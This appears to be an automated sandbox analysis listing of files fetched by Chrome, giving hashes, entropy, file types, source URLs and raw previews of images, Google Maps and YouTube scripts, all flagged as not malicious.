                                              Preview:.PNG........IHDR...d...d.....G<ef...wPLTE....C6.................XB.............T...B........>.......T........\....>/....F8L|.<.......^..V<.......JD...E:..d.........=.....F....M.F;......4..7|.....@0.....W....?4........Z.TH.........T......,...-.dc..K..|.....RO........_..Ay./.k....M....5.v........>@M.y...5s...o...............|k.u.2.G2.=-]...ol.ID....|...........L86.9lv....d~e...Rq....E>y....x.......mP.... IDATh..Xis.Z.......!..0`......././.w'....g.^&5ojf~..e...N..onTWT!.....E=.=.=.......q,...{v..Y..l."..c.n$...w=g......`..~...[.%..0...(2......Q.n{.....yz..D.....D.eY......z<dSSS..=......zs.m..T.|.1.....:...3.......z<...K..aY....B.-...Ht...V.~.k...d2..P.x...p....O{.o..I...J..8..../..X.)_Vw.e...b..Q(.1V?+...........B..9.a.PN.|..GD..J.H}[5.b..?.>.....U...eFF....L./..a.;.>.HX....i."...K.|4..c1..O..^.0.....JU..=%U>.....1..)......x.f...w$.|.\.....c$\.7...&/...y.....~....LH.7dnT.l..;.e..n.1G.b~`$..3.M.r..3.K|k.+.@...%K..5....a"...xa.!\.C..?S....,"..A..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (2406)
                                              Category:downloaded
                                              Size (bytes):78365
                                              Entropy (8bit):5.456753311036989
                                              Encrypted:false
                                              SSDEEP:1536:o/oPKW2/xQEiuVQf4bLR5dz34pkpZZvqxdESTsBKX4cg6KlJHkOV5FdaJC03Xu2i:uoPK//xQEiuVQf4btr32MZdqxGSgBKXQ
                                              MD5:9E43F550A52998CA7A0FD723D116582E
                                              SHA1:C6E39D9DFD56C38AA062CACF979D690C44E03C0F
                                              SHA-256:311E9E8A1ABDA5299C796E9DE880B4589FC5D52C72C0317DC5FF789B7929066F
                                              SHA-512:F759B63313B11E34815FE52186D31B6F1C9DC7B4A9D7D5425B5BF3048F5C005C85EFC044C342EF8B8A2B068FAE418EC0F44BEC148B59A29E2F40354DCB2F5C57
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/map.js
                                              Preview:google.maps.__gjsload__('map', function(_){var Gva=function(){var a=_.dr();return _.gi(a.Gg,18)},Hva=function(){var a=_.dr();return _.H(a.Gg,17)},Iva=function(a,b){return a.Eg?new _.cm(b.Eg,b.Fg):_.dm(a,_.lr(_.mr(a,b)))},Jva=function(a){if(!a.getDiv().hasAttribute("dir"))return!1;const b=a.getDiv().dir;return b==="rtl"?!0:b==="ltr"?!1:window.getComputedStyle(a.getDiv()).direction==="rtl"},Kva=function(a,b){const c=a.length,d=typeof a==="string"?a.split(""):a;for(let e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return e;return-1},Lva=function(a){return new Promise((b,.c)=>{window.requestAnimationFrame(()=>{try{a?_.Km(a,!1)?b():c(Error("Error focusing element: The element is not focused after the focus attempt.")):c(Error("Error focusing element: null element cannot be focused"))}catch(d){c(d)}})})},Mva=function(a,b){a.Fg.has(b);return new _.gra(()=>{Date.now()>=a.Ig&&a.reset();a.Eg.has(b)||a.Hg.has(b)?a.Eg.has(b)&&!a.Hg.has(b)&&a.Eg.set(b,"over_ttl"):(a.Eg.set(b,_.Dn()),a.Hg.add(b));r
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):59298
                                              Entropy (8bit):7.995653812057102
                                              Encrypted:true
                                              SSDEEP:1536:XYS6+Y8Io837whQn2MSfTnCyxuPSQipivuvW9IFUcQ7Ww2vNA4BJ:XqdL9naLx0SQipiL9pO
                                              MD5:99000E6B2E8EDCF6B05E5099BBDC9300
                                              SHA1:D600BB8FB9597CADE90B7CFC1E05A7AD7FD7FE48
                                              SHA-256:A5D07D3F89FCDDF11567E19D914553D69DD8E3E765ABF8CDCD1A04682AE7BD46
                                              SHA-512:F4C29ABE7F612061DD63B45836C1994F1DCF9A711289AC3F76327D5F1374AC816BFEF811690938596FE84045EFD615138DB1F785E003B5528003EA2D63EA6096
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 &....-...*....>.p.R.&.#.7.i ..gn......E..6.%.W.k..Z...N..r...:.e.....]Hq.....o......$..z3.y........?.?./.'.|._.............?..u......._...m....?...z.....>.P7.?...O...?.....|..........................o...............UUUUZ..wwwwwwwwwwwy..n..N.UW.t..........^'C...._.y..0..P..D./www..jn..>8..+....M.a...J....!.....V...........g..i.D*..l...%.6..`...=.A...!.....\:.r4...t..]q......n._...........GUUUUVX(7@.).mv$$.^..K..99z&A.c....gY.=._.......uUUUe...w...i..6=y.........-}?......2.,.`..{.pjD...&e......X(6..a|%.u..,...4...@..uUojfr.A.0....sAiP8D/,{-,.W,....S......h^X..=..................*....C32..3._....|.....,[......V4$.tD........G.7X-.m........>..:.......$..*.W.[..Pj..Gv...t..........'.j.t..d.. .i...-/...`.-.......7N.UY`....x.k,.r...[34.3..Z..... T{sE...VJ:..?u.Z..6..>.MCv......t.$.A..A.u..1C.L....""""..ybU..f^....!.0..6.u...Q.|.I~ft.........A...U{.+c....J...........UU-.n.....J../......uo&A.R.....3.)h\w.h.......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):57522
                                              Entropy (8bit):7.995273847882486
                                              Encrypted:true
                                              SSDEEP:1536:ODXP1COBUhabFpLmubsV5cwcncGVWO3VcIE:ODXNLBoabFpy3rcwcnYO36
                                              MD5:0B72E457F39BD498D6D899178522E211
                                              SHA1:DDD24758349E7A4E460D1C87271895A675DB40F2
                                              SHA-256:AD61A88A7009EB75C968C57462DD02F9062A5D8695566293F3F0A043F41F937B
                                              SHA-512:00FB7E1B97FFEE0DC6D83D46796D338423563D64DDB53D0B269531BADFD824C51EB9B3C132A3BFFF929EF16AFBC3BB68E49BCF1A23F7378FECBA299D70018E7F
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............ALPH.K.......$5.|..=.....}...s_..8.....g..#........2......lO...4....0.....j........6)....1...hT#.'333.....2Ou^.O......*L......f.Y.4...;..%h......-....}V.IN....2e.k.+..4....*3.......V..s..+.....-.y"~.8'.J.]D.....4._..h.6....m.$.....S..4...>.....@......z/.V...K.......z....Z.m.m....x.i.......n/....E..?@..}....1.......+^...;=..w..+..g..x.w~...~..;H(..wzl...wo.(..+H..k.W...g.a....+^...]T.u.^......L...]O>N....5...c....n..d..n<&./..2J.}.l.i~)...h..s....=...>.+.|......94.L0t=7B....I.Y....../...^..T....\.`,).r...2..F. G....&jl+Z..@;..k|...y....?1..'f.s..>A...Is7..p..(0.l...,z.<1G{..[..q~P......_..v{,|.l.@...L...9..k...Pt}.7....w....]....k8.[..w.N.....f../...J(.=.[...].........>m..).._[7&.....O|.?.q.....|v0w..k|...M.'...I'..........~..NC....>.X.ht.........]....=n....U(...a3....Y.{. _.b..<X.+B..~m}<b(w.......B....g....x"...+..U.....w....8+6.>..k|M...@Q@...nu....@......>....fU.Bw.J.._@H]J5I.7~}.;...l
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):64182
                                              Entropy (8bit):7.99551767247876
                                              Encrypted:true
                                              SSDEEP:1536:2bYy+eMgNpAXktn6SoA0nIzQKbHug35qqUQDk//VenJJO:gYyZMgz+anFILw3U4+/YJo
                                              MD5:16DFF002646E4A6141E24C4E53BD4269
                                              SHA1:B1A4509EFE0EA1C48422669AC1CEE727C463FB9F
                                              SHA-256:15881F397B5602C0181F9A398751D9A06A64444CFE3E81F699C3DBB152896D12
                                              SHA-512:AA954365829C0D82B2EDAA34B08825E8DBC6830B23A0AA594D42829881FE88894047CE08433E6E14DD6F55943ED565F48F2982B28F600A453482B2D1566C72BF
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 :...p....*....>.p.R.&......p..en._/<...U... ....K.....<.<jc...g7...?.y.s.~2.fy7.7..6.!.O..Z................?.w.WD...Ng...~..L.Z.4.....X.._..}......}..i......,....c.......{....p|..o...~.~.~..g....;....`?4.%.9...7.7./..f.j........IF* .p.o~@U...^o..uU..E...u[..*.I...g.O.=....![.2..G.B....a.s:)..c2.....=..+.bz'H..J..;.>C.v.Q...L.h-.6...&tx.yP@..0<....o.....r.d...+7......_nw$Ce^..Qj......GDl..er....a.H...n..WU..+.|....Q.>1(.^..Y..!n.HY(......k-x.......Z...._..........Qd.%2].Zf.&G.N&..n.I.wJ.y.......P..y...F9nO.......e.Dq.yp..tFL...6.j.t/GM...K|..1.)Gsp...pO.t..!.B"F..M._..........d.;..Y.....jeC.8..... (..o...r.b.d....1.$.G.F.6R.q8.C.w...8...<...J....H.U..fO>CWW..u...^..D...d...^.@d. .# .....I/...c+...$......%?..@...)^.....ez...rK*.cm?{s.f#Fay(.B.[..*.k..#.#Pm.Q..{.`.^...@.Q)d.1.ALZeW.Q..H.>3.....#!.t...t....N....bV..T.d.......[....{.U].."z.~.]lw.T.O.E...a..S.........._...]...k.y..K......0...UzK....e._.C....q.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):16206
                                              Entropy (8bit):7.709469914947277
                                              Encrypted:false
                                              SSDEEP:384:4YNg7dfQ8Z8CzNpJG13LXf8WhDC9MEQQ6jOI2z:4Yyh/8YGx8SDC9MEQQsr2z
                                              MD5:BEE552D839CCB41A29EA9DFFF0279829
                                              SHA1:CB2AB4AB7169746FF320AD22FAAF3F423B8F86FC
                                              SHA-256:A417A58DA6CED599BA01C18D00F73609B48C0546F3CAA15F4F4F5F839DB7C435
                                              SHA-512:11D4B86F4500CCF17503E31ACB666D327E96AB052A66CF09B9BB34580633F54B794C1D8F9BA7941F54DC690FB314F2E8A4AE6F55549367F4748C360579379656
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                              Category:dropped
                                              Size (bytes):1555
                                              Entropy (8bit):5.249530958699059
                                              Encrypted:false
                                              SSDEEP:24:hY6svN/6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z1sW:3qN/2+pUAew85zf
                                              MD5:FBE36EB2EECF1B90451A3A72701E49D2
                                              SHA1:AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
                                              SHA-256:E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
                                              SHA-512:7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
                                              Malicious:false
                                              Reputation:low
                                              Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (568)
                                              Category:dropped
                                              Size (bytes):2441635
                                              Entropy (8bit):5.606117513640613
                                              Encrypted:false
                                              SSDEEP:24576:1E4S8aGQ+5ULgOVJ4uIsZ9ouA1mXb0Do1QAKQ:i4S8a+5eVJNIsZ9Q1mXD
                                              MD5:62727FA83183431062CD87C2ED9D26EC
                                              SHA1:FEDD174111222776D78DE97EE624FCD19D170200
                                              SHA-256:6331E4536BB13101EB1A3546B8395BE20933FD13F4116855B96C15680B1316BA
                                              SHA-512:6ED7F2B847D7C1BD6859DBF7EF7814C0AE4D8A62719526AEA15AE57DD24262AC4B2324F84DE6E3A4D3AA9EEA92DE4A786E462FBFC95FA0FF83C5FAAE4A746D43
                                              Malicious:false
                                              Reputation:low
                                              Preview:var _yt_player={};(function(g){var window=this;/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC All Rights Reserved... Use of this source code is governed by an MIT-style license that can be. found in the LICENSE file at https://angular.dev/license.*/./*.. (The MIT License).. Copyright (C) 2014 by Vitaly Puzrin.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):9740
                                              Entropy (8bit):7.972399479101138
                                              Encrypted:false
                                              SSDEEP:192:b0tR67h4liUs2tSEDJYd4B8CV5Qlv5EKXcJilLOGLfAuvoDc3C9:b0tz3lFYvCV4vS+Zl6GLfA9
                                              MD5:DC06CC78FA5800F7738F2C0F0D908096
                                              SHA1:2C09B76DE57E2B258AB44799731DEFF0C7AFAF94
                                              SHA-256:BBA4B75E57D5020DD47AAFFB2DD79690792704D36325A3F62CE441D9B056AF0F
                                              SHA-512:B66199B792BD2B60A85C7F6FF66B92F93DE8252EFA439ADE8E44F461BEC53EF1C38E34B5B1E6AA23692DE07732F818521DD149773D86BE7FBEC3994D6B312145
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21411!3i14012!4i256!2m3!1e0!2sm!3i707457413!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=130071
                                              Preview:RIFF.&..WEBPVP8L.%../..?...6.mU..2.N'T@.s.px~.i.m.r..KZ......d....I.U...?..VO.<...3.Ac.EF4 ..+:.@.a..1@.(.S.E..BL..!a.%.....6%!.]H.....z8$.@[>(....5.....;J...J...J..._.{8.u.W....2F.c2..4..odZW...../..@ .o*..Q......H~*.....-.O..*..z...U^..f..K...=..!...Qx..OO.m...@...@.....`..UAq.[o...z.....$3..$.>..D...$.a.CT.....)...<..e.tXO.h;.).n,5....:...C.........B..-.Y...Yh...m.......G.Fk.YVR.h.B.!b?%w5....`7.X..;.Y.rE.Eghs...Y....C<.t_.hn3tS.....l..*..M2.V.C...1.w..............z....6C.nk.>t..;.j..f.4.)6.M......!8i".]...i....#V..Jp.=..Wb].....pf.hr..P..:...W...-;.....tX...R,..Fm=..K....n..I...R."O..7..e(..z.e^Y...(.I....GI%~G+..+..A...:!g.4...R..\..H..{.2......@....qn/....vJ.y...Xx4B..........|...p....@..Nu\..>....T.]....|s..m#..A../|..i.|....k..u.....4Z..u.....-....6....p..m6._.M........B..;.'.$...n{]6.=.K.....y?..5.L...;.....&...Xmw]6.].O,..6.1.{.!.....&.=.pWM...n#........d..l.../."....mc].e^N...Ww..U[.m;.....r|b...Iy.%}...n}.Ve-... ...-
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):16269
                                              Entropy (8bit):7.975366845092159
                                              Encrypted:false
                                              SSDEEP:384:K0wDqa5qxS5QogRdFlsQ/x0bLqg1iJlIs7P09i5IBR2:KJ5qseLdns6x0XqscX789F72
                                              MD5:4251B790E648A8BB811D309CEF12C5D3
                                              SHA1:45254C31E4864A91C46F36B4FBF7AFB5637F8582
                                              SHA-256:45A099032BEC4EA282CD5DABE430ACE0BE8D880606981D6FE1F822D0E851038E
                                              SHA-512:72697E87D85A7D01E631EE964C0954127EA55C6B5D512688256E4C15206BE75DCFA6FCF61A5F1E1A9D992AE3A4F4DBB34850B5E18CDCFE5E1F5C560DCEC4EC0F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/masafi.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x1500, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:downloaded
                                              Size (bytes):152926
                                              Entropy (8bit):7.9986612053401736
                                              Encrypted:true
                                              SSDEEP:3072:rZub6k1HwGMzvPRYOTdZ7G8w62F7xYxeKsUXAIOe:lub6k1QrvPRtTf7PwlYxrs4A3e
                                              MD5:E64A27CC3C13AB0C4D859CE4DED3E1FE
                                              SHA1:373F1726DE311CE9F60557897934453D086CB72E
                                              SHA-256:D05CFC1E3FCA2CC3602830EFBE6FD8AC13895DB8E6523909AF36765A338AC39D
                                              SHA-512:91A99F3DC8C9F7D0BBA7DB9810C0A814DEFED44A548E0B9F8EAE7BA5C5B752B3A78EA5801782D933D2886E5CE84645FC8AB30E7AE91FE82BB351F411EB7D86B5
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/portfolio/arla.webp
                                              Preview:RIFFVU..WEBPVP8 JU...l...*....>Q(.F#..&!.....in...w..+.&....s.2....[.....n....$`..>j...%.7......S.k.7..............Ns...>m}k......W...y......^.?R...M.....#.w.G.o..S.4.D...{...k_.=..w}.5R~................h.../.....>~..._....W............./.?....O.......{..C.....o....-....................................?..c}..T.....W...<h.G.....+..._....7~.?..........?....s...C.....O............\.5....*'&.)6...J...'........\..kJE..i.+.....\p...'.t`nF...W.O....SXp....7.5...Ma.<\J.....de!$.S.<.B.....X.c..[.|....73Ll.f.T...M...] .l#]..|..B........UX.S.....J. .._F..yZ....C.*.._z....v+......n.....Vz.I.}..q.&..O[.J~.....#$...C.-]...u.W......$.%.,....ps.....v{.........8._.......A...h|.t..6.......x5..%9........e.^....c...Y....5......SXp....7.5...M`..&..5.N.Gr..V#.08o.k.........2....N.....V...F..bj.[V..n...B..?....l.7.5.7.y4....7.5...Ma..S....iC6{.......Q..'........;].....Q..b8.*d...<Ret).,...&......a....u..x.l...#B.8E.$.#.V......G.Q..../%...4.......0.},...\...Er.@.:W..].W*.&s.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):130860
                                              Entropy (8bit):7.997712309008883
                                              Encrypted:true
                                              SSDEEP:3072:ubDYIS/1wynedxOwOizaQzHSKnqUYA7ka:u4IdyngxOwOizFznfYEk
                                              MD5:9D5B0A8F0C69E3B1B0BB1F0565435349
                                              SHA1:E39A9C61D7C9E0236B8160ECE3A51E91519987EF
                                              SHA-256:1CA5E96A3F88CBBC3612310CC6C0B1C41108DC9D343A953CF98FE2E4E2E52A4C
                                              SHA-512:0D0D44587247269C71AF2DF4E5F4573C5882F670EB36A247F137227214228B478F6833760A92FA3EFBD6B0E1B9CC1E16A4B95979249E7DAD3AD24A45FCAEFBA6
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF$...WEBPVP8X........7..(..ALPHwp.....m.I....u...7"&...2*.....@..E'.|.+F:g..i!FP....Jq....i.W...v.f.....T.*.p$.......*....U..=...b...........E.V..:............l{.H./..G.@0.J@.(.c...a..h@q..A.....~...D.-.v..$*..F......../.u{_.......k.S.^..q<....{.+..u{/.z....t$oK..d..-2b..l.......YL.z..1..ix.......#8}..O.........&....`q)..?..u..n.{.........dT...1..9..Z....E..].M._.NN...ah....y..w..>..7.<X....2.Yv.a.H?...#hh$Z.s..eH.H.R|....,.:.5e.y.!..a.'...".q...O8.#,m./C.....#...B.8..q..#.\.1..N.hu..X0..>z.G9....H....bG{d."|...1.qA%.y.1.<..9.K.V...'...0y..........#........._.......v..A..v...q.;Of..?..._...Q........v..?....}...q.&..-R...=Y.9....F...n...G..:...uJ....K.....D.=6;...[......sQ..B.....?.a.~uo........$.R...<......n... ....q.g.J...8.."=....?G........9.*K..~....?..q3....Yl.e.C...<....S......H..!.G...^Z..e.3K.;.?u$...ICUmQ......Y..Eg.E.k.........(.r......~?.._&...B...o....=:z.....f.-+......u....ju..M...:.....IE}.w.:*t....m..tSA*.......N^.KGM.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 99, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2642
                                              Entropy (8bit):7.89260383627698
                                              Encrypted:false
                                              SSDEEP:48:IfFc/yRv5d4mWygH9Uh/OTphwfy0RHcC0cBXnY492KVL3D4HYo823L:Ut52mM9Uh/OTpUxoe92ILzHoL7
                                              MD5:45A15F5355B666FFB018D04D294F2EEE
                                              SHA1:AF8D0BAE7BC32B15AF14A93C96C8D33F8EE71F7C
                                              SHA-256:0EFEEFD315E83FE2EEA0C6DD8F9DB95D4808CC24756E71C7B9169A7B15B174DE
                                              SHA-512:7666D3077D856EC76C7D4307DAF18798C15BEE25B68EA6D504A4CC91BD69CA127587B883F9E562DAB23F1B2BC37E09F03049E8228FA7BF0B48C4B3139B07158F
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...c.....Z9U....WPLTE.=..9..5~.4u.7...........@..<..B..B......./b.Gh..*h..........G.k.........6X....Rw..N.>x.7....IDATh.Z.r.0....an...=.....F..l9...=#.l.4.c...?y.k.c...[...{.EQtc_Gc...tf..'..~....4..1..te++).c..~.)...5...N....,..,K....V)..R.Z..r.[.d..h.A..... FnL....c.`9W..(|..._. e[.M...M..d..6.\VI9.zk-..<sB...A..........$...R......P.c.z.."4.......h...$...8BO<(Kot.....R.......Z.y..a(..&<v.{.....v .$.#.y/.=.\.Uy1.ku..`"9UVw......dV..7.%... .k!.P.e.,{s9.......:.a....5.f.1.. . .........<......wA..]....#.evAbr.,........D.r...W....f..V...o.X.....j..g6.a.N.pU... .e). .L....H.Uw..{..0.E(......Z?..].p.2J.k,"N..[&...C....=..m..=...{n3E.@.....@..5]%.8." PrT/vA(e...Yr.v....%...S.....$XA..].QE..$.]Zy.'..{..c [z.6J...w.5r.I...E.S!~.p.%X.-9r.....I.....2dU.`......U]c.{..G.@Y.._fZ.T..)...Q....(..)..]...M.B.T3..&.Q.k.3MI.g...-Q.c...v.I.. .*.$N....p......O...#.e8.".&;#...U...1..tB.F... ...'Q.@ .\. N^.]g..........b..i.05.....Q^\.MH.K..WBh..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                              Category:downloaded
                                              Size (bytes):388748
                                              Entropy (8bit):5.182833267031374
                                              Encrypted:false
                                              SSDEEP:1536:Mfi8ZHMCbS/mgV2B8ILJPptpJKztM6oyi+MOn4y6Ox5juDEnXrDJc7MsByDn+TEn:Mfi8Zimg0BtSoy9uf7LcSQoYN
                                              MD5:6BC73BD4E74E8993220F45682B0B7388
                                              SHA1:B55A53124024B3DDE36AAAB12B5C7DDA75C891F9
                                              SHA-256:716369DC2BA3761FAAABC317E82A604CFD41BB687251C981A267D4AE96A9C71D
                                              SHA-512:AD9E315D5762581CA2EAA4123CB6934D3E43861E0C22AE553C6AEB053B1823BA4CC57CB98ABFFDD5268B3089C38BFEF8B76F014B70512D72146ACD106826A73C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.youtube.com/s/player/26636eff/www-player.css
                                              Preview:@charset "UTF-8";.html5-video-player{position:relative;width:100%;height:100%;overflow:hidden;z-index:0;outline:0;font-family:"YouTube Noto",Roboto,Arial,Helvetica,sans-serif;color:#eee;text-align:left;direction:ltr;font-size:11px;line-height:1.3;-webkit-font-smoothing:antialiased;-webkit-tap-highlight-color:rgba(0,0,0,0);touch-action:manipulation}.html5-video-player,.ytp-contextmenu{-ms-high-contrast-adjust:none;forced-color-adjust:none}.html5-video-player:not(.ytp-transparent),.html5-video-player.unstarted-mode,.html5-video-player.ad-showing,.html5-video-player.ended-mode{background-color:#000}.ytd-video-masthead-ad-primary-video-renderer .html5-video-player:not(.ytp-transparent),.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.unstarted-mode,.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.ad-showing,.ytd-video-masthead-ad-primary-video-renderer .html5-video-player.ended-mode{background-color:transparent}.ytp-big-mode{font-size:17px}.ytp-autohide{cu
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):31821
                                              Entropy (8bit):7.895027904829223
                                              Encrypted:false
                                              SSDEEP:384:xUKr0cHH93k+yYZDK+FHzjS3M03KAkP07EvGDdzo/o7nMZhH5gDkJ301fweNugAJ:mMdH93k4knKq3WozM2DkJg4qo
                                              MD5:1C963B81E8B51DF4D3792D970765B40F
                                              SHA1:A1229488D0C7781E4A1E8B1D9BC1E28ECCB699A7
                                              SHA-256:407B907E4A18358C9861C93A8B1FDCF68E308887F49AFCFC53C60D6B0EC25A2C
                                              SHA-512:E0101F4FF6635ACE7A096CFE8D6DA869B0F3C40557A624A774ACB246E724A3AD2ECF2132B803E3C58C91F8613714BB1A627C96A6E4B9239F093024F3BAA127D1
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/5/b2a671651a783a422eb19b6350e975d4.jpg
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:2574861A925F11EDAD33D32BDDFEE87E" xmpMM:DocumentID="xmp.did:2574861B925F11EDAD33D32BDDFEE87E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:25748618925F11EDAD33D32BDDFEE87E" stRef:documentID="xmp.did:25748619925F11EDAD33D32BDDFEE87E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................R..@o..Yi..|K................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
